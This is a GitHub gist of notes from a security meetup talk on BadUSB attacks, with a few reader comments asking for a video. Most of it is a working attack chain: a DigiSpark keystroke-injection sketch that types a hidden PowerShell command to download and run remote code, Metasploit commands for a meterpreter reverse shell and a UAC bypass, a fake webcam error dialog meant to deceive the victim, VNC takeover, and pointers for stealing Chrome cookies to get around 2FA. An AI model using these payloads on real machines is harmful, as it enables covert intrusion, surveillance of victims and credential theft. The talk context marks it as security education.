Notes of Null talk on BadUSB
## Bad USB code | |
#include "DigiKeyboard.h" | |
#define WorkingPin 1 // Just as an LED indicator, as to when the work is finished | |
void setup() { | |
} | |
void loop() { | |
digitalWrite(WorkingPin, HIGH); | |
DigiKeyboard.sendKeyStroke(0); | |
DigiKeyboard.delay(500); | |
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); | |
DigiKeyboard.delay(500); | |
DigiKeyboard.print("powershell.exe -nop -w hidden -c $t=new-object net.webclient;$t.proxy=[Net.WebRequest]::GetSystemWebProxy();$t.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $t.downloadstring('http://192.168.1.2:8080/nFUICYVjGMT6a');"); | |
DigiKeyboard.sendKeyStroke(KEY_ENTER); | |
digitalWrite(WorkingPin, LOW); | |
for (;;) { | |
/*Stops the digispark from running the scipt again*/ | |
} | |
} | |
## Metasploit resource file used in demonstration msf-web-delivery.rc | |
use exploit/multi/script/web_delivery | |
set Target 2 | |
set LHOST <YOUR_LOCAL_IP_HERE> | |
set LPORT 6680 | |
set payload windows/x64/meterpreter/reverse_tcp | |
set AutoRunScript post/windows/manage/migrate # This step is necessary otherwise the session just dies | |
exploit -j | |
## For Popping up an innocuous message box, before starting capturing webcam snaps | |
DEFCON 20: Weaponizing the Windows API with Metasploit : https://youtu.be/bdUT20fwwfI?t=1527 | |
railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10) # 0x10 is for MB_ICONSTOP, taken from here : https://docs.microsoft.com/en-us/windows/desktop/api/winuser/nf-winuser-messagebox | |
If the above doesn't work you might need to put 'client' in the start of the command ( as shown in the video ), like this : | |
client.railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10) | |
## For VNC | |
After getting a meterpreter session : run vnc | |
Then connect with a VNC client on the "local machine" | |
## For privilege escalation ( https://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit/ ) | |
use exploit/windows/local/bypassuac_comhijack | |
set payload windows/x64/meterpreter/reverse_tcp | |
set session 2 | |
set LHOST <YOUR_LOCAL_IP_HERE> | |
exploit | |
## For extracting google chrome cookies, as extracting passwords would still need you to enter the OTP, if 2FA is enabled : | |
https://mango.pdf.zone/stealing-chrome-cookies-without-a-password | |
You can follow the discussion here ( quite interesting if you would ask ) : https://news.ycombinator.com/item?id=18376323 | |
There's a metasploit module available too : https://github.com/rapid7/metasploit-framework/blob/9616a9f79de0b22bfd142f12affd74cecbbd4413/documentation/modules/post/multi/gather/chrome_cookies.md | |
## State of the art things | |
Bad USB cables : https://mg.lol/blog/badusb-cables/ | |
O.M.G. cables : https://mg.lol/blog/omg-cable/ | |
## Other Useful Things | |
DigiSpark Scripts Repo : https://github.com/CedArctic/DigiSpark-Scripts | |
#shamelessSelfPromotion Ahead :p | |
You can read my other blogs here : https://lud1161.github.io/ | |
and | |
Here : https://lud1161.wordpress.com/ |
This comment has been minimized.
This comment has been minimized.
Hello @vishwaskheriwal, sorry to break out to you but the talk wasn't recorded and I am not getting time enough to make a tutorial for the same and put it up online. |
This comment has been minimized.
This comment has been minimized.
Hello @vishwaskheriwal |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
Sir can you provide a video on this topic.